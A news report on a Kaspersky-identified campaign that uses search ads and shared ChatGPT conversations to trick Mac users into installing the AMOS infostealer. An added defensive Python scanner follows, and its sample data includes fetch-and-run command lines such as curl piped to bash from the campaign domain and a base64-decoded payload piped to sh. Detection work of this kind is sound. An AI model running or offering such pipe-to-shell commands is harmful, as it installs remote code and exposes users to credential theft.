Kaspersky Uncovers macOS Infostealer Campaign Abusing ChatGPT's Chat-Sharing Feature

Kaspersky Threat Research has identified a new malware campaign that uses paid Google search ads and shared conversations on the official ChatGPT website to trick Mac users into running a command that installs the AMOS (Atomic macOS Stealer) infostealer and a persistent backdoor on their devices.

In the campaign, attackers buy sponsored search ads for queries such as "chatgpt atlas" and direct users to a page, hosted at chatgpt.com, that appears to be an installation guide for ChatGPT Atlas for macOS. In reality, the page is a shared ChatGPT conversation generated through prompt engineering and then sanitised so that only the step-by-step installation instructions remain. The guide instructs users to copy a single line of code, open Terminal on macOS, paste the command, and grant all requested permissions.

Kaspersky researchers' analysis shows that the command downloads and executes a script from the external domain atlas-extension.com. The script repeatedly prompts the user for their system password and validates it by attempting to run system commands. Once the correct password is supplied, the script downloads the AMOS infostealer, uses the stolen credentials to install it, and launches the malware. The infection flow is a variation of the so-called ClickFix technique, in which users are persuaded to manually execute shell commands that retrieve and run code from remote servers.
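
As a defensive illustration of the fetch-and-run pattern described above, this added example (not from Kaspersky or the original article) flags Terminal command lines that download and immediately execute remote code. The sample command lines and the regexes are constructed assumptions; only the domain atlas-extension.com comes from the article.

```python
import re

# Domain named in the article; the patterns below are illustrative assumptions.
KNOWN_DOMAINS = {"atlas-extension.com"}

FETCH = re.compile(r"\b(?:curl|wget)\b", re.I)
SHELL = r"(?:/bin/)?(?:ba|z|k)?sh\b"
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?" + SHELL)
SUBST_EXEC = re.compile(SHELL + r"\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b", re.I)
DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def classify(cmd):
    """Return the reasons a command line looks like ClickFix-style fetch-and-run."""
    reasons = []
    piped = bool(PIPE_TO_SHELL.search(cmd))
    # Download whose output goes straight into a shell, via pipe or $(...).
    if (FETCH.search(cmd) and piped) or SUBST_EXEC.search(cmd):
        reasons.append("remote-script-executed")
    # Encoded blob decoded and handed to a shell (hides the real command).
    if DECODE.search(cmd) and piped:
        reasons.append("decoded-payload-executed")
    hosts = {h.lower().rstrip(".") for h in HOST.findall(cmd)}
    if any(h == d or h.endswith("." + d) for h in hosts for d in KNOWN_DOMAINS):
        reasons.append("known-campaign-domain")
    return reasons


def scan(lines):
    """Map each flagged command line to its reasons; benign lines are omitted."""
    return {c: r for c in lines if (r := classify(c))}


# Constructed samples (shell history or process-event command lines),
# not the campaign's actual command.
SAMPLES = [
    "curl -fsSL https://atlas-extension.com/PLACEHOLDER | bash",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
    "echo Q09OU1RSVUNURUQ= | base64 -d | sh",
    "curl -fsSL https://example.invalid/tool.tar.gz -o tool.tar.gz",
    "brew install wget",
]

if __name__ == "__main__":
    for cmd, why in scan(SAMPLES).items():
        print(", ".join(why), "<-", cmd)
```
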
